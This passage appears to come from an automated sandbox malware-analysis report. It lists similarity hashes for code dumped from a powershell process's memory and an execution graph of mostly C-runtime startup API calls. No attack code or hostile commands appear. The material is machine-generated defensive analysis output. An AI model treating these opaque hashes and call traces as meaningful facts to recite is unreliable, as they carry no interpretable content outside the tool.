• Instruction ID: c2752e52813e7abaefa68d218c70e2128dc95f044ed1200a56c20247a02de37a
• Opcode Fuzzy Hash: 65860c9e54740533579cd0f849482f6e8c122604a72fa70e45d75bf8528d2940
• Instruction Fuzzy Hash: E101F2343002004FE3065B54C858A6A7BB2EFC5319F0A80B5D5059F396CF35EC128B94
Memory Dump Source
• Source File: 00000046.00000002.2705925408.00000000041E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 041E0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_70_2_41e0000_powershell.jbxd

Similarity
• API ID: (empty) • String ID: (empty) • API String ID: (empty)
• Opcode ID: b7ad1c28fc773a39aade0b5e36dd14996624ec7b3fc9d22bb4c1d60418d22139
• Instruction ID: 08c6858c1176e1ee332be91e462e6b56b3da577c8bfc622d4bc8b19b616879b0
• Opcode Fuzzy Hash: b7ad1c28fc773a39aade0b5e36dd14996624ec7b3fc9d22bb4c1d60418d22139
• Instruction Fuzzy Hash: A2010C75E00609DFDB10DFAAC48499EBBF5AF4C220F25C155E928A7360CB309D40DF64
Memory Dump Source
• Source File: 00000046.00000002.2705925408.00000000041E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 041E0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_70_2_41e0000_powershell.jbxd

Similarity
• API ID: (empty) • String ID: (empty) • API String ID: (empty)
• Opcode ID: 7a387e85d69bee65e893d55c91571cc88a67638a459407230b2787d02ef028ff
• Instruction ID: 95c7ef3c905cbf5e5ab03334b75b71ff07db132de277658bb4ee6f0a9f8f8df9
• Opcode Fuzzy Hash: 7a387e85d69bee65e893d55c91571cc88a67638a459407230b2787d02ef028ff
• Instruction Fuzzy Hash: BC012CB4D0430AEFDB54DFAAC845A6EBFF0BF04314F514699D924E7242D774A6418F90
Memory Dump Source
• Source File: 00000046.00000002.2705925408.00000000041E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 041E0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_70_2_41e0000_powershell.jbxd

Similarity
• API ID: (empty) • String ID: (empty) • API String ID: (empty)
• Opcode ID: e13b949e3820617e90688c3536a83eed3fdcae30a80c3ffbe561620106f0b152
• Instruction ID: 178093a81450851e32b129d7f26905a6542c887df7ed3bd8ddfa14652039b4bc
• Opcode Fuzzy Hash: e13b949e3820617e90688c3536a83eed3fdcae30a80c3ffbe561620106f0b152
• Instruction Fuzzy Hash: 50F024F67082506FC3105BAEAC84826BFE9EFCD25035640AAF505C7321DA70EC15C7A0
Memory Dump Source
• Source File: 00000046.00000002.2740304800.0000000007E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 07E10000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_70_2_7e10000_powershell.jbxd

Similarity
• API ID: (empty) • String ID: (empty) • API String ID: (empty)
• Opcode ID: bf7b41f8cc996fcef712b7b5c434da177afd0dedd958a31ef522becfd9ac52b6
• Instruction ID: 0cc591bb1602e31b43256f844bb515f2ad5c48398da922c6881586c4f543f987
• Opcode Fuzzy Hash: bf7b41f8cc996fcef712b7b5c434da177afd0dedd958a31ef522becfd9ac52b6
• Instruction Fuzzy Hash: A8F0E231305205EFC3185F25D866AAA77AAAFC2365F0440BFE605CB241CF309C45CBB1
Memory Dump Source
• Source File: 00000046.00000002.2705925408.00000000041E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 041E0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_70_2_41e0000_powershell.jbxd

Similarity
• API ID: (empty) • String ID: (empty) • API String ID: (empty)
• Opcode ID: 56f9e16e0e97dc73d32acfce189a9556c89248ca538d0bd6c9357ee40a316a45
• Instruction ID: 940844209e1cf691d4d3df445df5dc04a9933fcdf92f88fd849f46add83c09fe
• Opcode Fuzzy Hash: 56f9e16e0e97dc73d32acfce189a9556c89248ca538d0bd6c9357ee40a316a45
• Instruction Fuzzy Hash: 32F082763042516FC3055B6DDC8880ABBA9EF8E3203154067F905C7362DB71EC258B60
Memory Dump Source
• Source File: 00000046.00000002.2705925408.00000000041E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 041E0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_70_2_41e0000_powershell.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: 1aeed7d265569d46890466190272ca5f610b439debfae60de5ded455930f2dc0
                                                                                                                                                                                                                                • Instruction ID: c45b26e805a3ce6eb86cc14654064e221d8eae6ddfbbf477400427704c849460
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 1aeed7d265569d46890466190272ca5f610b439debfae60de5ded455930f2dc0
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 44F0B7B4E0420AEFDB54DFAAD845ABEBBF4AB48300F5145A9D918E7241E77496018B90
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000046.00000002.2740304800.0000000007E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 07E10000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_70_2_7e10000_powershell.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: 498740da2633c5975fdb0956d76ac8117b6c9778dee43df39a1abd27bfe3a33f
                                                                                                                                                                                                                                • Instruction ID: 391b80c88c27a6e92bef20e480cfa783cda2671d6c5a7ee2d3dfb1c4c85e85fa
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 498740da2633c5975fdb0956d76ac8117b6c9778dee43df39a1abd27bfe3a33f
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7AF03AB5B02219DFDF14CF80CD46BEEBBB5BB88318F205119D905BB250D7745A80CBA1
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000046.00000002.2705925408.00000000041E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 041E0000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_70_2_41e0000_powershell.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: 434f3ea12dc3b4e8907481c9b9cbcbdea2cac1eb9acc4ad1f74f0cd6d4ed10f9
                                                                                                                                                                                                                                • Instruction ID: 6272b2bbcc93270491a4973f6018b792232a9b5f379dcc8902313acddc549269
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 434f3ea12dc3b4e8907481c9b9cbcbdea2cac1eb9acc4ad1f74f0cd6d4ed10f9
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 39F02775A0410CEFD700DFA0E9547DD7BF2EB89314F2000A9D80957394DE312E50CB51
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000046.00000002.2705925408.00000000041E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 041E0000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_70_2_41e0000_powershell.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: 7cdf53b2ea0636bcbd444826f25e36053895e80e663b7084ab87bfcb682e8995
                                                                                                                                                                                                                                • Instruction ID: ed056877eda43f305fb933932fc096e20163935db5f444b70595aaad59aadf8d
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 7cdf53b2ea0636bcbd444826f25e36053895e80e663b7084ab87bfcb682e8995
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 31E04FB63102146BC7049AAEE884D4AFBEAEBCD620715403AF909C7321CA71EC1587A0
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000046.00000002.2740304800.0000000007E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 07E10000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_70_2_7e10000_powershell.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: 489c04decc7ab4a84387e0544149bd737a1e3e7c440f5d43371f05fa26c6746c
                                                                                                                                                                                                                                • Instruction ID: 93409c6f763ffce473942d2e2b73de99f5e82fad7ef867cd8741fe9459c34a2e
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 489c04decc7ab4a84387e0544149bd737a1e3e7c440f5d43371f05fa26c6746c
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8DE0C27174E2901BC702126DB81048ABF6E4DC323031E00A3D148C7693CE104C41C7EA
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000046.00000002.2705925408.00000000041E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 041E0000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_70_2_41e0000_powershell.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: 3003fbd467b7fabc3db487d9312a1a12c79c4d9e363563554194d83996b04bcb
                                                                                                                                                                                                                                • Instruction ID: c478fc9329f239621374e45804037e664ea98fd17dd33f1cf1b8839c711fa978
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3003fbd467b7fabc3db487d9312a1a12c79c4d9e363563554194d83996b04bcb
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4AE01275A0010CEFD704EFA0EA5566DBBF7EB89304F1051A8D90997354DE326F14DB51
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000046.00000002.2705925408.00000000041E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 041E0000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_70_2_41e0000_powershell.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: 162353d2d81c3174da79df585873e7ee2236cc4e9dccf73dd75578b2381935ef
                                                                                                                                                                                                                                • Instruction ID: 5459d006606028d49c6f1a3eee675df9a6e06b59deca9886d41bcd44066a5a82
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 162353d2d81c3174da79df585873e7ee2236cc4e9dccf73dd75578b2381935ef
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 25D02B323441241FC740932CE4109D93BEC8F4A728B0180A7E40CC7752CD55DC414BC9
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000046.00000002.2705925408.00000000041E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 041E0000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_70_2_41e0000_powershell.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: 3f82e551e62d3829ac2aafb306f60ecf5ec8763ac75e01d483c00e6281cc04a1
                                                                                                                                                                                                                                • Instruction ID: 6776d09985dce2a238668013e946b71697dea110b1564f172771b6518fd61d30
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3f82e551e62d3829ac2aafb306f60ecf5ec8763ac75e01d483c00e6281cc04a1
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: FBD0A73620410C5FE741EFD5E484E6277E9EF54704F0080B1EE488B121EB75F564A791
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000046.00000002.2740304800.0000000007E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 07E10000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_70_2_7e10000_powershell.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: 223bdfd803351f1f04179248d8139ef3e0bf45d1549e131da243a894a0ffb9da
                                                                                                                                                                                                                                • Instruction ID: 4f53fcc8bbdb146419e73af7835ede95ab43546d648fa51676a53d7b8212434d
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 223bdfd803351f1f04179248d8139ef3e0bf45d1549e131da243a894a0ffb9da
• Instruction Fuzzy Hash: F0E0ECF0B5611ECBDB15DF80CD16BED7BB87B49304F201415D202BA550DBB80A80C765
Memory Dump Source
• Source File: 00000046.00000002.2740304800.0000000007E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 07E10000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_70_2_7e10000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 29236afc58392a863d1e2c8224bd0e8afc2426cde827a0284f88c6d0b3ef3705
• Instruction ID: b6a59d30e56fdffc11dc7918fe4564bd3b7cab2afce534d2aa3815dcb883dc96
• Opcode Fuzzy Hash: 29236afc58392a863d1e2c8224bd0e8afc2426cde827a0284f88c6d0b3ef3705
• Instruction Fuzzy Hash: 5AC08C72309424230508304F280189FE6DE89C9830309003BE20CE3300CCA04C4282EA
Memory Dump Source
• Source File: 00000046.00000002.2705925408.00000000041E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 041E0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_70_2_41e0000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 47801d3a4c9fe9358672337e8b58069643e0d9c45d67b9a3bb0a8c7f0cb51140
• Instruction ID: 44c0f43fa137c9e397e09a1c6915deb1dc9b060aa524e6dc88aecf9002e0cb19
• Opcode Fuzzy Hash: 47801d3a4c9fe9358672337e8b58069643e0d9c45d67b9a3bb0a8c7f0cb51140
• Instruction Fuzzy Hash: B8C012313101244BC704975CE414D6977DD9B89729B1140A6E50DCB361CD92EC0147C9
Memory Dump Source
• Source File: 00000046.00000002.2705925408.00000000041E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 041E0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_70_2_41e0000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 33e55a7a07473ae50e78eeebc2d12e024a72cae72a6fae3380b268155e8bf2a4
• Instruction ID: bccbf0fc0bd89f7240fd772755bb0f5a8bf7544c98d0587ffa744a6b8a2eb36e
• Opcode Fuzzy Hash: 33e55a7a07473ae50e78eeebc2d12e024a72cae72a6fae3380b268155e8bf2a4
• Instruction Fuzzy Hash: 5AC08CEA00CBC02DD3535B70A8A48553F705E6362030501C3F1C09A8E38A1918B5D763
Memory Dump Source
• Source File: 00000046.00000002.2705925408.00000000041E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 041E0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_70_2_41e0000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 5e17aeaf25467352eba785900af4313ff857286415d80b93436ed919dd8df194
• Instruction ID: c8dbaf2ccac1a3336b724218a95677205d3728f16361958ff494f26b5770a1f4
• Opcode Fuzzy Hash: 5e17aeaf25467352eba785900af4313ff857286415d80b93436ed919dd8df194
• Instruction Fuzzy Hash: 66B012FD2E8D41B1590473B64DD0A7AD800EBB2B01B018C25B309C005486719474A21B
Strings
Memory Dump Source
• Source File: 00000046.00000002.2737955973.0000000007180000.00000040.00000800.00020000.00000000.sdmp, Offset: 07180000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_70_2_7180000_powershell.jbxd
Similarity
• API ID:
• String ID: 4'^q$4'^q$$^q$$^q
• API String ID: 0-2049395529
• Opcode ID: 215509026ae3885664f57c92b189354a19ffbff6e182717dbedef84e3a191b66
• Instruction ID: ff3acae28a1e18c23503caf87893c8de60cfe863c8dc561511cd641a449348b0
• Opcode Fuzzy Hash: 215509026ae3885664f57c92b189354a19ffbff6e182717dbedef84e3a191b66
• Instruction Fuzzy Hash: 0701D671B4A38A9FC37E26291820516AFB79BC6A5072E049BD081DF396CE558C4D83A3

Execution Graph

Execution Coverage: 7.9%
Dynamic/Decrypted Code Coverage: 0%
Signature Coverage: 2.3%
Total number of Nodes: 1213
Total number of Limit Nodes: 29
                                                                                                                                                                                                                                execution_graph 38251 7ff6faa8231c 38252 7ff6faa8238c 38251->38252 38253 7ff6faa82342 GetModuleHandleW 38251->38253 38264 7ff6faa86938 EnterCriticalSection 38252->38264 38253->38252 38257 7ff6faa8234f 38253->38257 38255 7ff6faa86998 fflush LeaveCriticalSection 38256 7ff6faa82460 38255->38256 38260 7ff6faa8246c 38256->38260 38262 7ff6faa82488 11 API calls 38256->38262 38257->38252 38265 7ff6faa824d4 GetModuleHandleExW 38257->38265 38258 7ff6faa82410 38258->38255 38259 7ff6faa82396 38259->38258 38263 7ff6faa843b8 16 API calls 38259->38263 38262->38260 38263->38258 38266 7ff6faa82525 38265->38266 38267 7ff6faa824fe GetProcAddress 38265->38267 38268 7ff6faa82535 38266->38268 38269 7ff6faa8252f FreeLibrary 38266->38269 38267->38266 38270 7ff6faa82518 38267->38270 38268->38252 38269->38268 38270->38266 38271 7ff6faa7b0fc 38290 7ff6faa7aa8c 38271->38290 38275 7ff6faa7b148 38281 7ff6faa7b169 __scrt_is_nonwritable_in_current_image __scrt_release_startup_lock 38275->38281 38298 7ff6faa8472c 38275->38298 38276 7ff6faa7b123 __scrt_acquire_startup_lock 38276->38275 38346 7ff6faa7b52c 7 API calls memcpy_s 38276->38346 38279 7ff6faa7b16d 38280 7ff6faa7b1f7 38302 7ff6faa83fc4 38280->38302 38281->38279 38281->38280 38347 7ff6faa82574 35 API calls FindHandlerForForeignException 38281->38347 38288 7ff6faa7b220 38348 7ff6faa7ac64 8 API calls 2 library calls 38288->38348 38291 7ff6faa7aaae __isa_available_init 38290->38291 38349 7ff6faa7e2f8 38291->38349 38297 7ff6faa7aab7 38297->38276 38345 7ff6faa7b52c 7 API calls memcpy_s 38297->38345 38300 7ff6faa84744 38298->38300 38299 7ff6faa84766 38299->38281 38300->38299 38398 7ff6faa7b010 38300->38398 38303 7ff6faa83fd4 38302->38303 38305 7ff6faa7b20c 38302->38305 38490 7ff6faa83c84 38303->38490 38306 7ff6faa57e20 
38305->38306 38539 7ff6faa6b470 GetModuleHandleW 38306->38539 38312 7ff6faa57e58 SetErrorMode GetModuleHandleW 38313 7ff6faa648cc 21 API calls 38312->38313 38314 7ff6faa57e7d 38313->38314 38315 7ff6faa63e48 137 API calls 38314->38315 38316 7ff6faa57e90 38315->38316 38317 7ff6faa33d3c 126 API calls 38316->38317 38318 7ff6faa57e9c 38317->38318 38319 7ff6faa7a444 new RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 38318->38319 38320 7ff6faa57ead 38319->38320 38321 7ff6faa57ebf 38320->38321 38322 7ff6faa33f18 70 API calls 38320->38322 38323 7ff6faa34d1c 157 API calls 38321->38323 38322->38321 38324 7ff6faa57ed6 38323->38324 38325 7ff6faa57eef 38324->38325 38326 7ff6faa36ad0 154 API calls 38324->38326 38327 7ff6faa34d1c 157 API calls 38325->38327 38328 7ff6faa57ee7 38326->38328 38329 7ff6faa57eff 38327->38329 38331 7ff6faa34e48 160 API calls 38328->38331 38330 7ff6faa57f0d 38329->38330 38333 7ff6faa57f14 38329->38333 38332 7ff6faa6b650 CreateEventW CloseHandle CreateEventW GetLastError CloseHandle 38330->38332 38331->38325 38332->38333 38334 7ff6faa34888 58 API calls 38333->38334 38335 7ff6faa57f57 38334->38335 38336 7ff6faa34fd0 268 API calls 38335->38336 38337 7ff6faa57f5f 38336->38337 38338 7ff6faa57f9e 38337->38338 38339 7ff6faa57f8c 38337->38339 38343 7ff6faa7b684 GetModuleHandleW 38338->38343 38340 7ff6faa6b650 CreateEventW CloseHandle CreateEventW GetLastError CloseHandle 38339->38340 38341 7ff6faa57f93 38340->38341 38341->38338 38342 7ff6faa6b57c 14 API calls 38341->38342 38342->38338 38344 7ff6faa7b698 38343->38344 38344->38288 38345->38276 38346->38275 38347->38280 38348->38279 38350 7ff6faa7e301 __vcrt_initialize_pure_virtual_call_handler __vcrt_initialize_winapi_thunks 38349->38350 38362 7ff6faa7eb08 38350->38362 38353 7ff6faa7aab3 38353->38297 38357 7ff6faa845e4 38353->38357 38355 7ff6faa7e318 38355->38353 38369 7ff6faa7eb50 DeleteCriticalSection 38355->38369 38359 7ff6faa89d4c 38357->38359 38358 7ff6faa7aac0 38358->38297 38361 
7ff6faa7e32c 8 API calls 3 library calls 38358->38361 38359->38358 38386 7ff6faa866c0 38359->38386 38361->38297 38363 7ff6faa7eb10 38362->38363 38365 7ff6faa7eb41 38363->38365 38366 7ff6faa7e30b 38363->38366 38370 7ff6faa7e678 38363->38370 38375 7ff6faa7eb50 DeleteCriticalSection 38365->38375 38366->38353 38368 7ff6faa7e8a4 8 API calls 3 library calls 38366->38368 38368->38355 38369->38353 38376 7ff6faa7e34c 38370->38376 38373 7ff6faa7e6cf InitializeCriticalSectionAndSpinCount 38374 7ff6faa7e6bb 38373->38374 38374->38363 38375->38366 38377 7ff6faa7e3b2 38376->38377 38382 7ff6faa7e3ad 38376->38382 38377->38373 38377->38374 38378 7ff6faa7e47a 38378->38377 38380 7ff6faa7e489 GetProcAddress 38378->38380 38379 7ff6faa7e3e5 LoadLibraryExW 38381 7ff6faa7e40b GetLastError 38379->38381 38379->38382 38380->38377 38383 7ff6faa7e4a1 38380->38383 38381->38382 38384 7ff6faa7e416 LoadLibraryExW 38381->38384 38382->38377 38382->38378 38382->38379 38385 7ff6faa7e458 FreeLibrary 38382->38385 38383->38377 38384->38382 38385->38382 38397 7ff6faa86938 EnterCriticalSection 38386->38397 38388 7ff6faa866d0 38389 7ff6faa88050 32 API calls 38388->38389 38390 7ff6faa866d9 38389->38390 38391 7ff6faa864d0 34 API calls 38390->38391 38396 7ff6faa866e7 38390->38396 38393 7ff6faa866e2 38391->38393 38392 7ff6faa86998 fflush LeaveCriticalSection 38394 7ff6faa866f3 38392->38394 38395 7ff6faa865bc GetStdHandle GetFileType 38393->38395 38394->38359 38395->38396 38396->38392 38399 7ff6faa7b020 pre_c_initialization 38398->38399 38419 7ff6faa82b00 38399->38419 38401 7ff6faa7b02c pre_c_initialization 38425 7ff6faa7aad8 38401->38425 38403 7ff6faa7b045 38404 7ff6faa7b049 _RTC_Initialize 38403->38404 38405 7ff6faa7b0b5 38403->38405 38430 7ff6faa7ace0 38404->38430 38462 7ff6faa7b52c 7 API calls memcpy_s 38405->38462 38407 7ff6faa7b0bf 38463 7ff6faa7b52c 7 API calls memcpy_s 38407->38463 38409 7ff6faa7b05a pre_c_initialization 38433 7ff6faa83b0c 38409->38433 38411 7ff6faa7b0ca 
__scrt_initialize_default_local_stdio_options 38411->38300 38414 7ff6faa7b06a 38461 7ff6faa7b7dc RtlInitializeSListHead 38414->38461 38416 7ff6faa7b06f pre_c_initialization 38417 7ff6faa84818 pre_c_initialization 35 API calls 38416->38417 38418 7ff6faa7b09a pre_c_initialization 38417->38418 38418->38300 38420 7ff6faa82b11 38419->38420 38421 7ff6faa82b19 38420->38421 38464 7ff6faa84f3c 15 API calls setbuf 38420->38464 38421->38401 38423 7ff6faa82b28 38465 7ff6faa84e1c 31 API calls _invalid_parameter_noinfo 38423->38465 38426 7ff6faa7ab96 38425->38426 38429 7ff6faa7aaf0 __scrt_initialize_onexit_tables 38425->38429 38466 7ff6faa7b52c 7 API calls memcpy_s 38426->38466 38428 7ff6faa7aba0 38429->38403 38467 7ff6faa7ac90 38430->38467 38432 7ff6faa7ace9 38432->38409 38434 7ff6faa83b2a 38433->38434 38435 7ff6faa83b40 38433->38435 38472 7ff6faa84f3c 15 API calls setbuf 38434->38472 38474 7ff6faa89370 38435->38474 38439 7ff6faa83b2f 38473 7ff6faa84e1c 31 API calls _invalid_parameter_noinfo 38439->38473 38440 7ff6faa83b72 38478 7ff6faa838ec 35 API calls pre_c_initialization 38440->38478 38442 7ff6faa7b066 38442->38407 38442->38414 38444 7ff6faa83b9c 38479 7ff6faa83aa8 15 API calls 2 library calls 38444->38479 38446 7ff6faa83bb2 38447 7ff6faa83bcb 38446->38447 38448 7ff6faa83bba 38446->38448 38481 7ff6faa838ec 35 API calls pre_c_initialization 38447->38481 38480 7ff6faa84f3c 15 API calls setbuf 38448->38480 38451 7ff6faa84a74 __free_lconv_mon 15 API calls 38451->38442 38452 7ff6faa83be7 38453 7ff6faa83c17 38452->38453 38454 7ff6faa83c30 38452->38454 38459 7ff6faa83bbf 38452->38459 38482 7ff6faa84a74 38453->38482 38457 7ff6faa84a74 __free_lconv_mon 15 API calls 38454->38457 38456 7ff6faa83c20 38458 7ff6faa84a74 __free_lconv_mon 15 API calls 38456->38458 38457->38459 38460 7ff6faa83c2c 38458->38460 38459->38451 38460->38442 38462->38407 38463->38411 38464->38423 38465->38421 38466->38428 38468 7ff6faa7acbf 38467->38468 38470 7ff6faa7acb5 _onexit 38467->38470 38471 7ff6faa84434 34 
API calls _onexit 38468->38471 38470->38432 38471->38470 38472->38439 38473->38442 38475 7ff6faa83b45 GetModuleFileNameA 38474->38475 38476 7ff6faa8937d 38474->38476 38475->38440 38488 7ff6faa891b0 48 API calls 4 library calls 38476->38488 38478->38444 38479->38446 38480->38459 38481->38452 38483 7ff6faa84a79 RtlFreeHeap 38482->38483 38487 7ff6faa84aa9 __free_lconv_mon 38482->38487 38484 7ff6faa84a94 38483->38484 38483->38487 38489 7ff6faa84f3c 15 API calls setbuf 38484->38489 38486 7ff6faa84a99 GetLastError 38486->38487 38487->38456 38488->38475 38489->38486 38491 7ff6faa83c98 38490->38491 38492 7ff6faa83ca1 38490->38492 38491->38492 38496 7ff6faa83ccc 38491->38496 38492->38305 38497 7ff6faa83ce5 38496->38497 38498 7ff6faa83caa 38496->38498 38499 7ff6faa89370 pre_c_initialization 48 API calls 38497->38499 38498->38492 38508 7ff6faa83e78 17 API calls 2 library calls 38498->38508 38500 7ff6faa83cea 38499->38500 38509 7ff6faa8978c GetEnvironmentStringsW 38500->38509 38503 7ff6faa83cf7 38506 7ff6faa84a74 __free_lconv_mon 15 API calls 38503->38506 38505 7ff6faa83d04 38507 7ff6faa84a74 __free_lconv_mon 15 API calls 38505->38507 38506->38498 38507->38503 38508->38492 38510 7ff6faa8985e 38509->38510 38511 7ff6faa897ba WideCharToMultiByte 38509->38511 38513 7ff6faa83cef 38510->38513 38514 7ff6faa89868 FreeEnvironmentStringsW 38510->38514 38511->38510 38515 7ff6faa89814 38511->38515 38513->38503 38521 7ff6faa83d38 31 API calls 4 library calls 38513->38521 38514->38513 38522 7ff6faa84ab4 38515->38522 38518 7ff6faa8984b 38520 7ff6faa84a74 __free_lconv_mon 15 API calls 38518->38520 38519 7ff6faa89824 WideCharToMultiByte 38519->38518 38520->38510 38521->38505 38523 7ff6faa84aff 38522->38523 38527 7ff6faa84ac3 __vcrt_getptd_noexit 38522->38527 38532 7ff6faa84f3c 15 API calls setbuf 38523->38532 38525 7ff6faa84ae6 RtlAllocateHeap 38526 7ff6faa84afd 38525->38526 38525->38527 38526->38518 38526->38519 38527->38523 38527->38525 38529 7ff6faa836c0 38527->38529 38533 7ff6faa83700 
